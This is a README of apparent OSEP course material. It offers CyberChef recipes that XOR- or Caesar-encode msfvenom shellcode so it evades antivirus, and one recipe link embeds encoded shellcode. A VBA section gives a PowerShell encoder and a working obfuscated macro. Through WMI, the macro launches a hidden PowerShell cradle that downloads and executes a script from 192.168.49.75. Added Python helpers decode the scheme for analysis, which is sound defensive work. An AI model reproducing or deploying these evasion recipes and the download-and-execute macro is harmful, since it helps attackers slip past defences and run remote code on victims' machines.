# OSEP CyberChef Recipes

Some handy CyberChef recipes for the OSEP exercises: they turn msfvenom shellcode into an obfuscated or encrypted variant meant to get past AV. Follow the link, paste your own msfvenom output into the input box and copy the encoded/encrypted result from the output box. It's that simple! You do still have to write the matching decoding/decrypting code yourself.

## C# based shellcode

cmd: `msfvenom -p <payload> -f csharp`

### Caesar cipher obfuscation:

Change the value in the ADD operation to your own Caesar offset, or swap ADD for SUB if you want to shift downwards instead.

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5Ebyte%5C%5C%5B%5C%5C%5D%20buf%20%3D%20new%20byte%5C%5C%5B%5C%5Cd%2B%5C%5C%5D'%7D,'',true,false,true,false)From_Hex('Auto')ADD(%7B'option':'Hex','string':'9'%7D)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,'%20%7D;',true,false,false,false)&input=

### XOR encryption:

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5Ebyte%5C%5C%5B%5C%5C%5D%20buf%20%3D%20new%20byte%5C%5C%5B%5C%5Cd%2B%5C%5C%5D'%7D,'',true,false,true,false)From_Hex('Auto')XOR(%7B'option':'Hex','string':'4c'%7D,'Standard',false)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,'%20%7D;',true,false,false,false)&input=

## C based shellcode

cmd: `msfvenom -p <payload> -f c`

Runner: https://github.com/TheWorkingDeveloper/OSEP-CyberChef-Recipes/blob/main/C-XOR-Runner.c

### XOR encryption:

Based on chapter 10.2.2 of OSEP.

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'(unsigned%20char%20buf%5C%5C%5B%5C%5C%5D%20%3D%20?%5C%5Cn%7C%5B%22;%5C%5C%5C%5Cx%5C%5Cn%5D)'%7D,'',true,false,true,false)From_Hex('Auto')XOR(%7B'option':'UTF8','string':'m'%7D,'Standard',false)To_Hex('%5C%5Cx',15)Find_/_Replace(%7B'option':'Regex','string':'(%5E%7C$)'%7D,'%22',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%5E%22'%7D,'unsigned%20char%20buf%5B%5D%20%3D%20%5C%5Cn%22',true,false,false,false)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,';',true,false,false,false)&input=dW5zaWduZWQgY2hhciBidWZbXSA9IAoiXHg2YVx4MzlceDU4XHgwZlx4MDVceDQ4XHg4NVx4YzBceDc0XHgwOFx4NDhceDMxXHhmZlx4NmFceDNjIgoiXHg1OFx4MGZceDA1XHg2YVx4MzlceDU4XHgwZlx4MDVceDQ4XHg4NVx4YzBceDc0XHgwOFx4NDhceDMxIgoiXHhmZlx4NmFceDNjXHg1OFx4MGZceDA1XHg0OFx4MzFceGZmXHg2YVx4MDlceDU4XHg5OVx4YjZceDEwIgoiXHg0OFx4ODlceGQ2XHg0ZFx4MzFceGM5XHg2YVx4MjJceDQxXHg1YVx4YjJceDA3XHgwZlx4MDVceDQ4IgoiXHg4NVx4YzBceDc4XHg1MVx4NmFceDBhXHg0MVx4NTlceDUwXHg2YVx4MjlceDU4XHg5OVx4NmFceDAyIgoiXHg1Zlx4NmFceDAxXHg1ZVx4MGZceDA1XHg0OFx4ODVceGMwXHg3OFx4M2JceDQ4XHg5N1x4NDhceGI5IgoiXHgwMlx4MDBceDA1XHgzOVx4YzBceGE4XHg3Nlx4MDNceDUxXHg0OFx4ODlceGU2XHg2YVx4MTBceDVhIgoiXHg2YVx4MmFceDU4XHgwZlx4MDVceDU5XHg0OFx4ODVceGMwXHg3OVx4MjVceDQ5XHhmZlx4YzlceDc0IgoiXHgxOFx4NTdceDZhXHgyM1x4NThceDZhXHgwMFx4NmFceDA1XHg0OFx4ODlceGU3XHg0OFx4MzFceGY2IgoiXHgwZlx4MDVceDU5XHg1OVx4NWZceDQ4XHg4NVx4YzBceDc5XHhjN1x4NmFceDNjXHg1OFx4NmFceDAxIgoiXHg1Zlx4MGZceDA1XHg1ZVx4NmFceDdlXHg1YVx4MGZceDA1XHg0OFx4ODVceGMwXHg3OFx4ZWRceGZmIgoiXHhlNiI7
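The C# and C recipes above are single-byte ADD/XOR passes wrapped in some regex housekeeping. When checking what a recipe produced, or when recovering the original bytes from a sample whose runner reveals the key, it helps to have the same step outside the browser. The Python below is an added example, not code from this repository: it parses both msfvenom layouts (`-f csharp` and `-f c`, before or after the recipe) and applies CyberChef's ADD, SUB or XOR with a single-byte key. The two sample arrays are constructed from four arbitrary bytes and are not shellcode.

```python
import re

# Constructed sample in msfvenom's "-f csharp" layout after the ADD 9 recipe above.
# Four arbitrary bytes, not shellcode; the original values were 01 02 fe ff.
CSHARP_SAMPLE = """byte[] buf = new byte[4] {
0x0a,0x0b,0x07,0x08 };
"""

# Constructed sample in msfvenom's "-f c" layout after the XOR 'm' recipe above
# (same four original bytes).
C_SAMPLE = r'''unsigned char buf[] = 
"\x6c\x6f\x93\x92";
'''

# Matches "0x.." (C#) and "\x.." (C) byte tokens; everything else in the blob is layout.
HEX_BYTE = re.compile(r"(?:0x|\\x)([0-9a-fA-F]{2})")


def parse_buf(text: str) -> bytes:
    """Extract the byte values from msfvenom C# or C output, raw or recipe-processed."""
    return bytes(int(h, 16) for h in HEX_BYTE.findall(text))


def byte_transform(data: bytes, op: str, key: int) -> bytes:
    """Apply CyberChef's ADD, SUB or XOR with a single-byte key.

    ADD and SUB wrap at 8 bits, which is what CyberChef does per byte.
    """
    if not 0 <= key <= 0xFF:
        raise ValueError("single-byte key expected")
    ops = {
        "add": lambda b: (b + key) & 0xFF,
        "sub": lambda b: (b - key) & 0xFF,
        "xor": lambda b: b ^ key,
    }
    return bytes(ops[op](b) for b in data)


def recover(text: str, op: str, key: int) -> bytes:
    """Undo one recipe step: the inverse of ADD is SUB, and XOR is its own inverse."""
    inverse = {"add": "sub", "sub": "add", "xor": "xor"}[op]
    return byte_transform(parse_buf(text), inverse, key)


if __name__ == "__main__":
    print(recover(CSHARP_SAMPLE, "add", 9).hex())        # 0102feff
    print(recover(C_SAMPLE, "xor", ord("m")).hex())      # 0102feff
```

`parse_buf` ignores the `byte[] buf = new byte[N] {` / `unsigned char buf[] =` prefix, the quotes and the trailing `};`, so the same call works on msfvenom's raw output and on what the recipe's final Find/Replace steps emit.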

## VBA string obfuscation

### Encoder example:

```powershell
# Plaintext to encode (the same string the CyberChef encoder link below carries as its input)
$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.49.75/6.8.1-v1.ps1'))"

[string]$output = ""
$payload.ToCharArray() | %{
    # Shift each character's byte value up by 19 ...
    [string]$thischar = [byte][char]$_ + 19
    # ... and left-pad the decimal value to a fixed width of three digits
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output
```

Encoder: https://gchq.github.io/CyberChef/#recipe=Decode_text('UTF-8%20(65001)')ADD(%7B'option':'Decimal','string':'19'%7D)To_Decimal('Space',false)Find_/_Replace(%7B'option':'Regex','string':'%5E%7C$%7C%20'%7D,'%20%20',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%20(%5C%5Cd%7B1%7D)%20'%7D,'%2000$1%20',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20(%5C%5Cd%7B2%7D)%20'%7D,'%200$1%20',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20'%7D,'',true,false,true,false)&input=cG93ZXJzaGVsbCAtZXhlYyBieXBhc3MgLW5vcCAtdyBoaWRkZW4gLWMgaWV4KChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDkuNzUvNi44LjEtdjEucHMxJykp

### Example decoder:

```vba
' Undo the +19 shift on one decoded 3-digit value
Function Pomomon(Boomon)
    Pomomon = Chr(Boomon - 19)
End Function

' First three characters of the string (one encoded character)
Function Strawberries(Boyyolr)
    Strawberries = Left(Boyyolr, 3)
End Function

' Everything after the first three characters
Function Hhonowno(Oemondcvz)
    Hhonowno = Right(Oemondcvz, Len(Oemondcvz) - 3)
End Function

' Walk the encoded string three digits at a time and rebuild the plaintext
Function Qeerere(Nodfmniw)
    Do
    Nonropowokwemon = Nonropowokwemon + Pomomon(Strawberries(Nodfmniw))
    Nodfmniw = Hhonowno(Nodfmniw)
    Loop While Len(Nodfmniw) > 0
    Qeerere = Nonropowokwemon
End Function

Function MyMacro()
    Dim Nocvbdd As String
    Dim Mohzqdd As String
    
    ' Output of the encoder above for the $payload string
    Nocvbdd = "131130138120133134123120127127051064120139120118051117140131116134134051064129130131051064138051123124119119120129051064118051124120139059059129120138064130117125120118135051134140134135120128065129120135065138120117118127124120129135060065119130138129127130116119134135133124129122059058123135135131077066066068076069065068073075065071076065074072066073065075065068064137068065131134068058060060"
    Mohzqdd = Qeerere(Nocvbdd)
    ' The two short literals decode to "winmgmts:" and "Win32_Process"
    GetObject(Qeerere("138124129128122128135134077")).Get(Qeerere("106124129070069114099133130118120134134")).Create Mohzqdd, Omfodn, Monono, Nappoor
End Function
```

Decoder: https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'(.%7B3%7D)'%7D,'$1%20',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%200%2B'%7D,'%20',true,false,true,false)From_Decimal('Space',false)SUB(%7B'option':'Decimal','string':'19'%7D)&input=
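The same scheme seen from the analysis side: a quoted literal made only of three-digit decimal groups is the encoder's fingerprint in macro source, and decoding it is subtraction of the offset per group. The Python below is an added example, not code from this repository. It pulls such literals out of VBA text, decodes them with the offset of 19 used above, and, for a sample that uses a different offset, lists every offset that yields printable ASCII. The three encoded strings are copied from the macro above; the macro fragment they are searched in is constructed.

```python
import re

# Encoded strings copied from the macro above (offset 19).
WINMGMTS = "138124129128122128135134077"
WIN32_PROCESS = "106124129070069114099133130118120134134"
PAYLOAD = "131130138120133134123120127127051064120139120118051117140131116134134051064129130131051064138051123124119119120129051064118051124120139059059129120138064130117125120118135051134140134135120128065129120135065138120117118127124120129135060065119130138129127130116119134135133124129122059058123135135131077066066068076069065068073075065071076065074072066073065075065068064137068065131134068058060060"

# Constructed macro fragment, used only to show how the literals are located in source.
MACRO_SNIPPET = (
    'Nocvbdd = "%s"\n'
    'GetObject(Qeerere("%s")).Get(Qeerere("%s"))\n'
) % (PAYLOAD, WINMGMTS, WIN32_PROCESS)

# A quoted literal consisting solely of complete 3-digit groups has the encoder's shape.
ENCODED_LITERAL = re.compile(r'"((?:\d{3})+)"')


def groups(encoded: str):
    """Split an encoded string into its 3-digit decimal values."""
    if not encoded.isdigit() or len(encoded) % 3:
        raise ValueError("expected a run of 3-digit decimal groups")
    return [int(encoded[i:i + 3]) for i in range(0, len(encoded), 3)]


def decode_vba_string(encoded: str, offset: int = 19) -> str:
    """Reverse the encoder: subtract the offset from each group and map back to a character."""
    return "".join(chr(g - offset) for g in groups(encoded))


def candidate_offsets(encoded: str):
    """Offsets for which every group lands in printable ASCII (32..126).

    Useful when a sample does not use 19; the shortest literal narrows the list least,
    so run it over the longest one.
    """
    gs = groups(encoded)
    return [k for k in range(0, 256) if all(32 <= g - k <= 126 for g in gs)]


def find_encoded_strings(vba_source: str):
    """Locate literals with the encoder's shape in macro source, in order of appearance."""
    return ENCODED_LITERAL.findall(vba_source)


if __name__ == "__main__":
    for literal in find_encoded_strings(MACRO_SNIPPET):
        print(decode_vba_string(literal))
    print(candidate_offsets(PAYLOAD))
```

`candidate_offsets` is deliberately loose: it only rejects offsets that push some group outside printable ASCII, so it returns a short list to eyeball rather than a single answer.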